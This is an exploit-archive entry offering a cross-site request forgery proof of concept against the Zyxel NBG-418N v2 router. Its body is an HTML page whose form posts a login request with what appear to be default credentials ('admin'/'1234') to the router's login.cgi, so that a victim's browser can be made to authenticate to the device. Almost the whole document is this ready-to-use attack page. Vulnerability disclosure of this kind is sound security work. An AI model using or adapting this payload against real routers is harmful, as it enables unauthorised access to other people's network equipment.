# Exploit Title: NBG-418N v2 Modem CSRF Exploit & PoC
# Date: 28-12-2018
# Exploit Author: Alican Gönüllü - God3err
# Version: Zyxel NBG-418N v2 v1.00(AAXM.4)C0
# Tested on: Windows 10 x64
Exploits :
----------------------------
<html><head>
<title>NBG-418N v2 Modem CSRF Exploit & PoC</title>
</head><body>
<form action="http://10.0.0.1/login.cgi" method="POST">
<input type="text" name="username" id="username" value="admin" /><br />
<input type="text" name="password" id="password" value="1234" /><br />
<input id="loginBtn" onclick="return onlogin()" type='submit' value='Go!' />
<input type="hidden" name="submit.htm?login.htm" value="Send">
</form>
</body></html>